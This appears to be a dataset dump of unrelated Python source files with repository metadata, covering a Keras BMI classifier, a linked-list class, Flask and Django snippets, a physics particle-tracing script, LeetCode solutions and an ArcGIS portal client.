import numpy as np import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split from sklearn.preprocessing import OneHotEncoder, StandardScaler from sklearn.metrics import roc_curve, auc from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense import pandas as pd from sklearn.metrics import confusion_matrix, classification_report, accuracy_score data = pd.read_csv('https://raw.githubusercontent.com/pykwon/python/master/testdata_utf8/bmi.csv') print(data.head(3)) print(data.info()) replace = {'thin':0,'normal':1,'fat':2} data = data.replace({'label':replace}) x = np.array(data.iloc[:,:-1]) # print(x.shape) y_data = np.array(data.iloc[:,-1]) # print(x_data) # print(y_data) onehot = OneHotEncoder(categories='auto') y = onehot.fit_transform(y_data[:,np.newaxis]).toarray() # print(x) # print(y) # 표준화 ''' scaler = StandardScaler() x = scaler.fit_transform(x) print(x[:2]) ''' x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=1) print(x_train.shape,' ', x_test.shape) # (14000, 2) (6000, 2) print(y_train.shape,' ', y_test.shape) # (14000, 3) (6000, 3) model = Sequential() model.add(Dense(32, input_dim=2, activation='relu')) model.add(Dense(16, activation='relu')) model.add(Dense(8, activation='relu')) model.add(Dense(3, activation='softmax')) # print(model.summary()) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) history = model.fit(x_train,y_train, epochs=20, batch_size=32,verbose=2) print('모델 검증 : ', model.evaluate(x_test, y_test)) print('----------------') y_pred = np.argmax(model.predict(x_test), axis= 1) print('예측값 :', y_pred) real_y = np.argmax(y_test, axis =1).reshape(-1,1) print('실제값 :', real_y.ravel()) print('-------------') plt.figure(figsize=(12,4)) plt.subplot(121) plt.plot(history.history['loss'],'b-',label='loss') plt.xlabel('Epoch') plt.ylabel('loss') plt.legend() plt.subplot(122) 
plt.plot(history.history['accuracy'],'r-',label='acc') plt.xlabel('Epoch') plt.ylabel('accuracy') plt.legend() plt.show() plt.figure() plt.plot([0, 1], [0, 1], 'k--') pred_y = model.predict(x_test) fpr, tpr, _ = roc_curve(y_test.ravel(),pred_y.ravel()) print('AUC: ',auc(fpr,tpr)) plt.plot(fpr, tpr) plt.xlabel('False Positive rate') plt.ylabel('True Positive rate') plt.title('ROC Curve') plt.legend() plt.show() print('confusion_matrix \n',confusion_matrix(real_y, y_pred)) print('accuracy : ', accuracy_score(real_y, y_pred)) print('classification_report : \n', classification_report(real_y, y_pred)) height = float(input('height : ')) weight = float(input('weight : ')) new_x = [[height,weight]] new_pred = model.predict(new_x) print('new_pred : ', np.argmax(new_pred, axis = 1))
[ "Bonghwan@DESKTOP-60LSTNL" ]
Bonghwan@DESKTOP-60LSTNL
d00caac2348180d52c10a1aca86c341683d7ad20
ec99362e7b0f9b6f96cd92c995a388c149655d3e
/ggvinfosite/ggvinfosite/wsgi.py
99b30d968bcb39576ccd96fee6ae2ac0fcbae093
[]
no_license
anidem/ggv-info-py
5d43f1fe0e14b9a3db775276d31a5405d7ee9c69
1b2e772575cd7ea163aaaae7b871fbf937294d43
refs/heads/master
2021-01-20T17:58:30.684821
2016-08-09T04:30:35
2016-08-09T04:30:35
60,475,905
0
0
null
null
null
null
UTF-8
Python
false
false
498
py
""" WSGI config for ggvinfosite project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application from mezzanine.utils.conf import real_project_name os.environ.setdefault("DJANGO_SETTINGS_MODULE", "%s.settings" % real_project_name("ggvinfosite")) application = get_wsgi_application()
[ "richmedina@gmail.com" ]
richmedina@gmail.com
e8b7a74f2a29bbe1760be0f63fe1f519849bd05a
270e3cf2d508d916e8aaa5c4210fa593ff4c3a72
/Python_Scripting/Pycharm_projects/DataStructures/LinkedList/SingleLinkedList/SingleLinkedList.py
87b9c4a732555029d1a0c10f2f405bc5abf57fd9
[]
no_license
NagiReddyPadala/python_programs
140c45ee1e763ec4aa8ef975be18c5fad1e0a7ec
18d91095c0e25345b8c1bc16d121df9a40639c5f
refs/heads/master
2020-12-08T03:29:35.030951
2020-02-29T16:23:36
2020-02-29T16:23:36
232,871,073
0
0
null
null
null
null
UTF-8
Python
false
false
8,078
py
class Node(): def __init__(self, data): self.data = data self.next = None class LinkedList(): def __init__(self): self.head = None def append(self, data): new_node = Node(data) if self.head is None: self.head = new_node return last_node = self.head while last_node.next: last_node = last_node.next last_node.next = new_node def prepend(self, data): new_node = Node(data) new_node.next = self.head self.head = new_node def insertAfterNode(self, prevNode, data): new_node = Node(data) new_node.next = prevNode.next prevNode.next = new_node def delete_node(self, data): cur_node = self.head if cur_node and cur_node.data == data: self.head = cur_node.next cur_node = None return prev_node = None while cur_node and cur_node.data != data: prev_node = cur_node cur_node = cur_node.next if prev_node: prev_node.next = cur_node.next cur_node = None def delete_node_at_pos(self, pos): cur_node = self.head if pos == 0: self.head = cur_node.next cur_node = None return prev_node = None count = 1 while cur_node and count <= pos: prev_node = cur_node cur_node = cur_node.next count += 1 if prev_node: prev_node.next = cur_node.next cur_node = None def length(self): cur_node = self.head count = 0 while cur_node: cur_node = cur_node.next count += 1 print("Length of the linked list is: ", count) return count def swap_nodes(self, key1, key2): if key1 == key2: return prev1 = None cur1 = self.head while cur1 and cur1.data != key1: prev1 = cur1 cur1 = cur1.next prev2 = None cur2 = self.head while cur2 and cur2.data != key2: prev2 = cur2 cur2 = cur2.next if not cur1 or not cur2: return if prev1: prev1.next = cur2 else: self.head = cur2 if prev2: prev2.next = cur1 else: self.head = cur1 cur1.next, cur2.next = cur2.next, cur1.next def reverse_iterative(self): prev = None curr = self.head while curr: next = curr.next curr.next = prev prev = curr curr = next self.head = prev def recursive_reverse(self): def _recursive_reverse(curr, prev): if not curr: return prev next = curr.next curr.next = prev prev = 
curr curr = next return _recursive_reverse(curr, prev) self.head = _recursive_reverse(curr = self.head, prev = None) def merge_sorted(self, llist): p = self.head q = llist.head s = None if not p: return q if not q: return p if p and q: if p.data <= q.data: s = p p = s.next else: s = q q = s.next new_head = s while p and q: if p.data <= q.data: s.next = p s = p p = s.next else: s.next = q s = q q = s.next if not p: s.next = q if not q: s.next = p def remove_duplicates(self): cur_node = self.head prev_node = None dup_values = dict() while cur_node: if cur_node.data in dup_values: prev_node.next = cur_node.next cur_node = None else: dup_values[cur_node.data] = 1 prev_node = cur_node cur_node = prev_node.next def print_nth_from_last(self, n): total_len = self.length() cur_node = self.head while cur_node: if total_len == n: print(cur_node.data) return total_len -= 1 cur_node = cur_node.next if cur_node is None: return def count_occurances_iterative(self, val): cur_node = self.head count = 0 while cur_node: if cur_node.data == val: count += 1 cur_node = cur_node.next return count def count_occurances_recursive(self, node, data): if not node: return 0 if node.data == data: return 1 + self.count_occurances_recursive(node.next, data) else: return self.count_occurances_recursive(node.next, data) def rotate(self, k): p = self.head q = self.head prev = None count = 0 while p and count < k: prev = p p = p.next q = q.next count += 1 p = prev while q: prev = q q = q.next q = prev q.next = self.head self.head = p.next p.next = None def move_tail_to_head(self): last = self.head second_to_last = None while last.next: second_to_last = last last = last.next last.next = self.head second_to_last.next = None self.head = last def printllist(self): cur_node = self.head while cur_node: print(cur_node.data) cur_node = cur_node.next # llist = LinkedList() # print("Head is: ", llist.head) # llist.append("A") # print("Head is: ", llist.head) # llist.append("B") # llist.append("C") # 
llist.append("D") """ print("Head is: ", llist.head) llist.printllist() print("Head is: ", llist.head) llist.prepend("C") llist.printllist() llist.insertAfterNode(llist.head.next,"D") print("**********") llist.printllist() print("*************") #llist.delete_node("D") #llist.delete_node_at_pos(1) llist.printllist() llist.length() print("After swappig") llist.swap_nodes("C", "B") llist.printllist() """ #llist.reverse_iterative() #llist.printllist() # # print("After recursive reverse") # llist.recursive_reverse() # llist.printllist() # llist1 = LinkedList() # # llist1.append(1) # llist1.append(3) # llist1.append(5) # llist1.append(7) # # llist2 = LinkedList() # llist2.append(2) # llist2.append(4) # llist2.append(6) # llist2.append(8) # # print(llist1.printllist()) # print(llist2.printllist()) # # llist1.merge_sorted(llist2) # # print(llist1.printllist()) # # llist1 = LinkedList() # # llist1.append(1) # llist1.append(2) # llist1.append(1) # llist1.append(2) # llist1.append(3) # llist1.printllist() # llist1.remove_duplicates() # print("***********") # llist1.printllist() # llist1 = LinkedList() # # llist1.append(1) # llist1.append(2) # llist1.append(3) # llist1.append(4) # llist1.append(5) # llist1.printllist() # print("***********") # llist1.print_nth_from_last(2) # llist1 = LinkedList() # # llist1.append(1) # llist1.append(2) # llist1.append(1) # llist1.append(2) # llist1.append(3) # # print(llist1.count_occurances_iterative(1)) # print(llist1.count_occurances_iterative(2)) # print(llist1.count_occurances_iterative(3)) # print("***********") # # print(llist1.count_occurances_recursive(llist1.head, 1)) # print(llist1.count_occurances_recursive(llist1.head, 2)) # print(llist1.count_occurances_recursive(llist1.head, 3)) # # llist1 = LinkedList() # # llist1.append(1) # llist1.append(2) # llist1.append(3) # llist1.append(4) # llist1.append(5) # llist1.append(6) # # llist1.rotate(4) # llist1.printllist() llist1 = LinkedList() llist1.append(1) llist1.append(2) 
llist1.append(3) llist1.append(4) llist1.move_tail_to_head() llist1.printllist()
[ "nagireddypadala434@email.com" ]
nagireddypadala434@email.com
f528a850125e7dd3fa24e232122710ac04537d1c
7c4878b4881d79dd4daa3291e9c498e0706a7603
/lessons19/Словари - основы/task2.py
2e30a33d5cfbf90181166d2a86c70b24f321931c
[ "MIT" ]
permissive
zainllw0w/skillbox
4cbdbb44762439c1aa1793a07683d7620500ddd7
896287b6f7f5612cf589094131fd1a12b0b192ba
refs/heads/main
2023-04-27T16:07:16.613359
2021-05-20T14:12:11
2021-05-20T14:12:11
329,755,030
0
0
null
2021-05-20T14:06:42
2021-01-14T23:01:15
Python
UTF-8
Python
false
false
636
py
student_input = input('Введите информацию о студенте через пробел: фамилию, имя студента, город проживания, вуз, в котором он учится, и все его оценки\n').split() student_info = dict() student_info['Фамилия'] = student_input[0] student_info['Имя'] = student_input[1] student_info['Город'] = student_input[2] student_info['Вуз'] = student_input[3] student_info['Оценки'] = [] for i in student_input[4:]: student_info['Оценки'].append(i) for i in student_info: print(i, ':', student_info[i])
[ "77465388+zainllw0w@users.noreply.github.com" ]
77465388+zainllw0w@users.noreply.github.com
68fd3fe6c771bb15adf73caf8b69bb3cfdf15b3b
5e84763c16bd6e6ef06cf7a129bb4bd29dd61ec5
/blimgui/dist/OpenGL/raw/EGL/KHR/cl_event.py
ceb2b4eb41ae154e01ca2b74068ee0e01c4f6f8b
[ "MIT" ]
permissive
juso40/bl2sdk_Mods
8422a37ca9c2c2bbf231a2399cbcb84379b7e848
29f79c41cfb49ea5b1dd1bec559795727e868558
refs/heads/master
2023-08-15T02:28:38.142874
2023-07-22T21:48:01
2023-07-22T21:48:01
188,486,371
42
110
MIT
2022-11-20T09:47:56
2019-05-24T20:55:10
Python
UTF-8
Python
false
false
685
py
'''Autogenerated by xml_generate script, do not edit!''' from OpenGL import platform as _p, arrays # Code generation uses this from OpenGL.raw.EGL import _types as _cs # End users want this... from OpenGL.raw.EGL._types import * from OpenGL.raw.EGL import _errors from OpenGL.constant import Constant as _C import ctypes _EXTENSION_NAME = 'EGL_KHR_cl_event' def _f( function ): return _p.createFunction( function,_p.PLATFORM.EGL,'EGL_KHR_cl_event',error_checker=_errors._error_checker) EGL_CL_EVENT_HANDLE_KHR=_C('EGL_CL_EVENT_HANDLE_KHR',0x309C) EGL_SYNC_CL_EVENT_COMPLETE_KHR=_C('EGL_SYNC_CL_EVENT_COMPLETE_KHR',0x30FF) EGL_SYNC_CL_EVENT_KHR=_C('EGL_SYNC_CL_EVENT_KHR',0x30FE)
[ "justin.sostmann@googlemail.com" ]
justin.sostmann@googlemail.com
711097389ae82580b61b73cfaee9fbcbb2b655c4
e3a24297a28e9fd2e54e82ec15e84cfcf4cd5b9c
/widukind_api/plugins/html_plugin.py
444179f5072b38f971fb7e1688d9fd082a953f0e
[]
no_license
mmalter/widukind-api
13557cdd5a9626d1b753b466fe025a88cbfc0f20
1518f533471da7b108cb37cc95033989bf7d1839
refs/heads/master
2021-01-24T00:09:21.507044
2016-02-18T06:40:00
2016-02-18T06:40:00
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,884
py
from flask import Blueprint, render_template, abort from widukind_api import queries bp = Blueprint('html', __name__) #TODO: error enable False @bp.route('/providers', endpoint="providers") def html_providers(): query = {"enable": True} projection = {"_id": False, "name": True, "slug": True, "enable": True} docs = queries.col_providers().find(query, projection) return render_template("providers.html", providers=docs) @bp.route('/datasets/<provider>', endpoint="datasets-by-provider") @bp.route('/datasets', endpoint="datasets") def html_datasets(provider=None): query_providers = {"enable": True} projection_provider = {"_id": False, "name": True, "slug": True} query_datasets = {"enable": True} projection_datasets = {"_id": False, "name": True, "slug": True, "dataset_code": True, "provider_name": True} if provider: provider_doc = queries.col_providers().find_one({"slug": provider}) query_datasets["provider_name"] = provider_doc["name"] query_providers["name"] = provider_doc["name"] providers = dict([(doc["name"], doc) for doc in queries.col_providers().find(query_providers, projection_provider)]) query_datasets["provider_name"] = {"$in": list(providers.keys())} datasets = queries.col_datasets().find(query_datasets, projection_datasets) docs = {} for dataset in datasets: provider_name = dataset["provider_name"] if not provider_name in docs: docs[provider_name] = {"provider": providers[provider_name], "datasets": []} docs[provider_name]["datasets"].append(dataset) return render_template("datasets.html", docs=docs)
[ "stephane.rault@radicalspam.org" ]
stephane.rault@radicalspam.org
3bf9cbd9b9ff1b4494f7623711e6c15af177a006
0add969034a82912bc6e19abc427abe883ee65bb
/FSSA_response/trace_particle_new.py
9c4deb04f2b387378e23208c7afeffb304127ed8
[]
no_license
Michael-Gong/New_LPI_python_script
eefd162fdbbc3c614c66e2b157ea5296e3bc8492
9de109c6f19aa60bdeaf102e9a1ec0baff5669ad
refs/heads/master
2020-03-28T16:06:09.631550
2020-02-01T08:21:17
2020-02-01T08:21:17
148,659,608
2
0
null
null
null
null
UTF-8
Python
false
false
5,701
py
import sdf #import matplotlib #matplotlib.use('agg') #import matplotlib.pyplot as plt import numpy as np #from numpy import ma #from matplotlib import colors, ticker, cm #from matplotlib.mlab import bivariate_normal #from optparse import OptionParser #import os #from colour import Color ######## Constant defined here ######## pi = 3.1415926535897932384626 q0 = 1.602176565e-19 # C m0 = 9.10938291e-31 # kg v0 = 2.99792458e8 # m/s^2 kb = 1.3806488e-23 # J/K mu0 = 4.0e-7*pi # N/A^2 epsilon0 = 8.8541878176203899e-12 # F/m h_planck = 6.62606957e-34 # J s wavelength= 1.0e-6 frequency = v0*2*pi/wavelength exunit = m0*v0*frequency/q0 bxunit = m0*frequency/q0 denunit = frequency**2*epsilon0*m0/q0**2 #print 'electric field unit: '+str(exunit) #print 'magnetic field unit: '+str(bxunit) #print 'density unit nc: '+str(denunit) font = {'family' : 'monospace', 'color' : 'black', 'weight' : 'normal', 'size' : 20, } from_path='./two/' to_path='./two/' data = sdf.read(from_path+"i_tot0850.sdf",dict=True) grid_x = data['Grid/Particles/subset_only_e/E_1'].data[0]/wavelength grid_y = data['Grid/Particles/subset_only_e/E_1'].data[1]/wavelength #grid_z = data['Grid/Particles/subset_only_e/E_1'].data[2]/wavelength work_x = data['Particles/Time_Integrated_Work_x/subset_only_e/E_1'].data work_y = data['Particles/Time_Integrated_Work_y/subset_only_e/E_1'].data #work_z = data['Particles/Time_Integrated_Work_z/subset_only_e/E_1'].data px = data['Particles/Px/subset_only_e/E_1'].data/(m0*v0) py = data['Particles/Py/subset_only_e/E_1'].data/(m0*v0) #pz = data['Particles/Pz/subset_only_e/E_1'].data/(m0*v0) gg = (px**2+py**2+1)**0.5 part13_id = data['Particles/ID/subset_only_e/E_1'].data #part13_id = part13_id[ (grid_x>11) & (grid_x<41) & (abs(grid_y) < 3.2) ] #part13_id = part13_id[ (abs(grid_y) < 3.2) ] part13_id = part13_id[ (gg > 1200)]# & (abs(work_x) > 5*abs(work_y)) ] print('part13_id size is ',part13_id.size,' max ',np.max(part13_id),' min ',np.min(part13_id)) #data = 
sdf.read(from_path+"0050.sdf",dict=True) #grid_x = data['Grid/Particles/subset_high_e/electron'].data[0]/wavelength #grid_y = data['Grid/Particles/subset_high_e/electron'].data[1]/wavelength #part00_id = data['Particles/ID/subset_high_e/electron'].data #part00_id = part00_id[ ( grid_x>5 ) ] #part13_id = np.intersect1d(part00_id,part13_id) #print('after intersect 0000.sdf part_id size is ',part13_id.size,' max ',np.max(part13_id),' min ',np.min(part13_id)) ######### Parameter you should set ########### start = 0 # start time stop = 1200 # end time step = 1 # the interval or step # if (os.path.isdir('jpg') == False): # os.mkdir('jpg') ######### Script code drawing figure ################ #for n in range(start,stop+step,step): # #### header data #### # data = sdf.read(from_path+'i_tot'+str(n).zfill(4)+".sdf",dict=True) # header=data['Header'] # time=header['time'] # if ( n==start ): # part_id = data['Particles/ID/subset_only_e/E_1'].data # else: # part_id = np.intersect1d(data['Particles/ID/subset_only_e/E_1'].data, part_id) # print('Particle_ID size is ',part_id.size,' max ',np.max(part_id),' min ',np.min(part_id)) # #part_id = np.intersect1d(part_id,part13_id) part_id = part13_id #print('After intersecting with final.sdf') #print('Particle_ID size is ',part_id.size,' max ',np.max(part_id),' min ',np.min(part_id)) # # ########## Parameter you should set ########### #start = 0 # start time #stop = 465 # end time #step = 1 # the interval or step px_3d = np.zeros([part_id.size,stop-start+1]) py_3d = np.zeros([part_id.size,stop-start+1]) xx_3d = np.zeros([part_id.size,stop-start+1]) yy_3d = np.zeros([part_id.size,stop-start+1]) work_x_3d = np.zeros([part_id.size,stop-start+1]) work_y_3d = np.zeros([part_id.size,stop-start+1]) for n in range(start,stop+step,step): #### header data #### data = sdf.read(from_path+'i_tot'+str(n).zfill(4)+".sdf",dict=True) grid_x = data['Grid/Particles/subset_only_e/E_1'].data[0]/wavelength grid_y = 
data['Grid/Particles/subset_only_e/E_1'].data[1]/wavelength work_x = data['Particles/Time_Integrated_Work_x/subset_only_e/E_1'].data work_y = data['Particles/Time_Integrated_Work_y/subset_only_e/E_1'].data px = data['Particles/Px/subset_only_e/E_1'].data/(m0*v0) py = data['Particles/Py/subset_only_e/E_1'].data/(m0*v0) temp_id = data['Particles/ID/subset_only_e/E_1'].data # px = px[np.in1d(temp_id,part_id)] # py = py[np.in1d(temp_id,part_id)] # pz = pz[np.in1d(temp_id,part_id)] # grid_x = grid_x[np.in1d(temp_id,part_id)] # grid_y = grid_y[np.in1d(temp_id,part_id)] # grid_z = grid_z[np.in1d(temp_id,part_id)] # work_x = work_x[np.in1d(temp_id,part_id)] # work_y = work_y[np.in1d(temp_id,part_id)] # work_z = work_z[np.in1d(temp_id,part_id)] # # temp_id = temp_id[np.in1d(temp_id,part_id)] for ie in range(part_id.size): px_3d[ie,n-start] = px[temp_id==part_id[ie]] py_3d[ie,n-start] = py[temp_id==part_id[ie]] xx_3d[ie,n-start] = grid_x[temp_id==part_id[ie]] yy_3d[ie,n-start] = grid_y[temp_id==part_id[ie]] work_x_3d[ie,n-start] = work_x[temp_id==part_id[ie]] work_y_3d[ie,n-start] = work_y[temp_id==part_id[ie]] print('finised '+str(round(100.0*(n-start+step)/(stop-start+step),4))+'%') np.save(to_path+'px2d_l',px_3d) np.save(to_path+'py2d_l',py_3d) np.save(to_path+'xx2d_l',xx_3d) np.save(to_path+'yy2d_l',yy_3d) np.save(to_path+'workx2d_l',work_x_3d) np.save(to_path+'worky2d_l',work_y_3d)
[ "noreply@github.com" ]
Michael-Gong.noreply@github.com
b0971028b099b5fd7fb1594bf79e3b29e8aca198
e585c3a61b830d3c24a8cec8343d262c84c724e7
/SomosAgro/src/mobile/user_interface/activities/caracteristicas_publicacion_activity.py
6667b92035a466737d7ff03c30c1bb828a77142c
[]
no_license
Valupiruiz/AutomationPHP
bb0728b2b6508b017c133a7d560a652033adeaf4
9a92634ac9f5b27e46723294f9a4cc83a1f99252
refs/heads/master
2023-01-18T17:27:57.819270
2020-11-27T15:04:49
2020-11-27T15:04:49
310,594,260
0
0
null
null
null
null
UTF-8
Python
false
false
858
py
from src.mobile.user_interface.mother_screen import MotherScreen from src.mobile.user_interface.locators.caracteristicas_publicacion_locators import CaracteristicasPublicacionLocators from src.mobile.user_interface.activities.descripcion_activity import DescripcionActivity class CaracteristicasPublicacionActivity(MotherScreen): def __init__(self, driver): super().__init__(driver) self.__locators = CaracteristicasPublicacionLocators() def seleccionar_dias(self, dias): _locator = self.__locators.CANTIDAD_DIAS_TEMP.format_locator({"cant_dias": str(dias)}) self.t_single_tap(_locator) def get_precio(self): return int(self.find_element(self.__locators.PRECIO_PUBLICACION_VW).text.replace("$", "")) def continuar(self): super().continuar() return DescripcionActivity(self.driver)
[ "tomasmoreira04@gmail.com" ]
tomasmoreira04@gmail.com
644e1e1c5554c3ddecf72791f602993a39e8c6c8
f65fc577e87084dbeb0bf42aed4fd10e37fb46e4
/tapiriik/web/views/__init__.py
20f4f6b5f3556e1b1e1581ebc0f790a70b9e1447
[]
no_license
chemikadze/tapiriik
4637d7deef7fdd0b86cac30e2917ae45824bfee1
ec75f9d691691a66c6b002cabe734fffbf6ce3bf
refs/heads/master
2021-01-17T11:17:20.541665
2014-01-01T19:13:34
2014-01-01T19:13:34
null
0
0
null
null
null
null
UTF-8
Python
false
false
285
py
from .dashboard import * from .diagnostics import * from .auth import * from .account import * from .sync import * from .supported_activities import * from .supported_services import * from .payments import * from .settings import * # why did I do it this way? should make it less bad
[ "cpf@cpfx.ca" ]
cpf@cpfx.ca
23abccf6e279d1b05e90ee110ff1aac079fd41eb
02ce6d29fec0d68ca2a2a778d37d2f2cff1a590e
/Day01-15/code/Day13/multithread1.py
ee8f83985de00593d5b95dfe88aee3e6c7bf0df9
[]
no_license
CalvinCheungCoder/Python-100-Days
605045122e40c119abc32466c32479559a4d4b9b
0f9bec8893954d4afbe2037dad92885c7d4d31f8
refs/heads/master
2020-04-17T11:49:42.148478
2019-09-19T10:22:37
2019-09-19T10:22:37
166,556,771
1
0
null
null
null
null
UTF-8
Python
false
false
1,236
py
# 使用多线程的情况 - 模拟多个下载任务 from random import randint from time import time, sleep import atexit import _thread def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % filename) def shutdown_hook(start): end = time() print('总共耗费了%.3f秒.' % (end - start)) def main(): start = time() # 将多个下载任务放到多个线程中执行 thread1 = _thread.start_new_thread(download_task, ('Python从入门到住院.pdf',)) thread2 = _thread.start_new_thread(download_task, ('Peking Hot.avi',)) # 注册关机钩子在程序执行结束前计算执行时间 atexit.register(shutdown_hook, start) if __name__ == '__main__': main() # 执行这里的代码会引发致命错误(不要被这个词吓到) 因为主线程结束后下载线程再想执行就会出问题 # 需要说明一下 由于_thread模块属于比较底层的线程操作而且不支持守护线程的概念 # 在实际开发中会有诸多不便 因此我们推荐使用threading模块提供的高级操作进行多线程编程
[ "984382258@qq.com" ]
984382258@qq.com
6c4f916ab3dde9c3c73afc2ce13730c11e20b449
9703641c14b7c19f2fcf937150204ab85b4151a2
/map_reduce.py
87ecd4b4ecd80fdeefd121254a0c3b40ccc5a51c
[]
no_license
walkmiao/Little_Case
8effbea554c930e0eb32d4335ecbd5541a9c1251
ab445659e19c85ecfd9b99f8d615c33f900662f8
refs/heads/master
2021-06-11T05:30:39.415720
2019-05-14T10:37:29
2019-05-14T10:37:29
128,582,484
1
0
null
null
null
null
UTF-8
Python
false
false
750
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2018/4/14 11:05 # @Author : LCH # @Site : # @File : map_reduce.py # @Software: PyCharm from functools import reduce print('map函数打印'.center(20,'*')) L1=map(lambda x:('整数'+str(x)),[x for x in range(1,10) if (x%2==0)]) for i in L1: print(i) print('reduce 函数打印'.center(20,'*')) L2=reduce(lambda x,y:x*y,[x for x in range (1,10) if (x%2==0)]) print(L2) print('分割线'.center(20,'-')) print('fileter 函数打印'.center(20,'*')) def f(x): if x%2==0: return x L3=filter(lambda x:f(x),[x for x in range(1,10)]) for i in L3: print(i) print('sorted函数打印'.center(20,'*')) L4=sorted([x for x in range(1,10)],key=abs) for i in L4: print(i)
[ "372815340@qq.com" ]
372815340@qq.com
4da87d1a40389b28f78cfe305a3a0639b5b29e12
c4b94158b0ac8f1c4f3d535b6cdee5d1639743ce
/Python/111__Minimum_Depth_of_Binary_Tree.py
6fe7a6cb166e10c97b1bc7263b6fa7b285ff494a
[]
no_license
FIRESTROM/Leetcode
fc61ae5f11f9cb7a118ae7eac292e8b3e5d10e41
801beb43235872b2419a92b11c4eb05f7ea2adab
refs/heads/master
2020-04-04T17:40:59.782318
2019-08-26T18:58:21
2019-08-26T18:58:21
156,130,665
2
0
null
null
null
null
UTF-8
Python
false
false
1,219
py
# Definition for a binary tree node. # class TreeNode(object): # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution(object): def minDepth(self, root): """ :type root: TreeNode :rtype: int """ if not root: return 0 else: stack, min_depth = [(1, root)], float("inf") while stack: depth, root = stack.pop() children = [root.left, root.right] if not any(children): min_depth = min(depth, min_depth) for c in children: if c: stack.append((depth + 1, c)) return min_depth # Or Use Recursion class Solution: def minDepth(self, root): """ :type root: TreeNode :rtype: int """ if not root: return 0 children = [root.left, root.right] # if we're at leaf node if not any(children): return 1 min_depth = float("inf") for child in children: if child: min_depth = min(self.minDepth(child), min_depth) return min_depth + 1
[ "junou_cui@berkeley.edu" ]
junou_cui@berkeley.edu
dba2464ce4ec39659e48e36fb8993b924f58f5a4
9851c3f47c1aa165bc0d239074fe238f82055875
/LeetCode/1470. Shuffle the Array/solution.py
d87117a07f282268c856397090c5fbb36069116d
[ "Apache-2.0" ]
permissive
InnoFang/algo-set
12f886dbec0da664327d26bcaf02c1316151a643
2419a7d720bea1fd6ff3b75c38342a0ace18b205
refs/heads/master
2023-03-16T09:51:24.631068
2023-03-13T11:08:54
2023-03-13T11:08:54
86,413,001
23
9
null
null
null
null
UTF-8
Python
false
false
440
py
""" 53 / 53 test cases passed. Runtime: 24 ms Memory Usage: 15.2 MB """ class Solution: def shuffle(self, nums: List[int], n: int) -> List[int]: return [nums[(i >> 1) + n] if i & 1 else nums[(i >> 1)] for i in range(2 * n)] """ 53 / 53 test cases passed. Runtime: 50 ms Memory Usage: 15.1 MB """ class Solution2: def shuffle(self, nums: List[int], n: int) -> List[int]: return sum(zip(nums[:n], nums[n:]), ())
[ "innofang@outlook.com" ]
innofang@outlook.com
ef8b0f71bb72e856120f0380af6305f0cdb7c789
8f8498bb6f56b19d45a1989c8113a077348c0a02
/SWEA/Level 4/격자판의 숫자 이어 붙이기.py
0d5c2c5b5ad7a58fb2d1115a1e87ee2fe8dbf278
[]
no_license
gjtjdtn201/practice
a09b437c892b0b601e156c09cb1f053b52fab11b
ea45582b2773616b2b8f350b927559210009d89f
refs/heads/master
2021-01-01T13:29:46.640740
2020-11-28T00:55:37
2020-11-28T00:55:37
239,299,485
0
1
null
null
null
null
UTF-8
Python
false
false
615
py
import sys sys.stdin = open('격자판에 숫자 이어 붙이기.txt', 'r') def ad(n, al, a, b): if n == 7: visit.add(al) return for i in range(4): ny = a + dy[i] nx = b + dx[i] if 0 <= ny < 4 and 0 <= nx < 4: ad(n+1, al+matrix[ny][nx], ny, nx) dy = [1, -1, 0, 0] dx = [0, 0, 1, -1] for tc in range(1, int(input())+1): matrix = [] for i in range(4): matrix.append(list(input().split())) visit = set() for y in range(4): for x in range(4): ad(1, matrix[y][x], y, x) print('#{} {}'.format(tc, len(visit)))
[ "gjtjdtn201@naver.com" ]
gjtjdtn201@naver.com
2f8935e90b1f58cd08d61595961b2acef65972f0
61b565b8ebc39dd561fee2923b94027efb42b7f6
/agsadmin/sharing_admin/content/users/UserContentBase.py
84ea50006a2e27b2e7ff9bcf689d6f05a0ae99f1
[ "BSD-3-Clause" ]
permissive
DavidWhittingham/agsadmin
30cc8ac9297db1f169aa3f2cf068bbfba77d9b2f
31960c01321df95d5918950371d3d795da2d0579
refs/heads/develop
2023-07-24T02:35:01.492001
2023-07-05T04:24:09
2023-07-05T04:24:09
13,790,963
3
5
BSD-3-Clause
2018-03-06T06:10:19
2013-10-23T01:51:30
Python
UTF-8
Python
false
false
2,470
py
from __future__ import (absolute_import, division, print_function, unicode_literals) from builtins import (ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str, super, zip) from ...._utils import send_session_request from ..._PortalEndpointBase import PortalEndpointBase from .AddItemParams import AddItemParams from .ListItemsParams import ListItemsParams from .PublishParams import PublishParams from .UserItem import UserItem class UserContentBase(PortalEndpointBase): def __init__(self, requests_session, url_base, username): super().__init__(requests_session, url_base) self._pdata = {"username": username} @property def _url_full(self): return "{0}/{1}".format(self._url_base, self.username) @property def username(self): return self._pdata["username"] def add_item(self, add_item_params): add_item_params = add_item_params._get_params() if isinstance(add_item_params, AddItemParams) else add_item_params r = self._create_operation_request(self, "addItem", method="POST", data=add_item_params) return send_session_request(self._session, r).json() def get_item(self, item_id): """ Gets a link to a content item in the portal owned by a particular user. """ return UserItem(self._session, self._url_full, self.username, item_id) def list_items(self, list_items_params=None): """ Gets a list of item details. 
""" list_items_params = None if list_items_params == None else list_items_params._get_params() if isinstance( list_items_params, ListItemsParams) else list_items_params r = self._create_operation_request(self, data=list_items_params) return send_session_request(self._session, r).json() def publish(self, publish_params): publish_params = publish_params._get_params() if isinstance(publish_params, PublishParams) else publish_params r = self._create_operation_request(self, "publish", method="POST", data=publish_params) return send_session_request(self._session, r).json() def replace_service(self, replace_service_request): r = self._create_operation_request(self, "replaceService", method="POST", data=replace_service_request) return send_session_request(self._session, r).json()
[ "DavidWhittingham@users.noreply.github.com" ]
DavidWhittingham@users.noreply.github.com
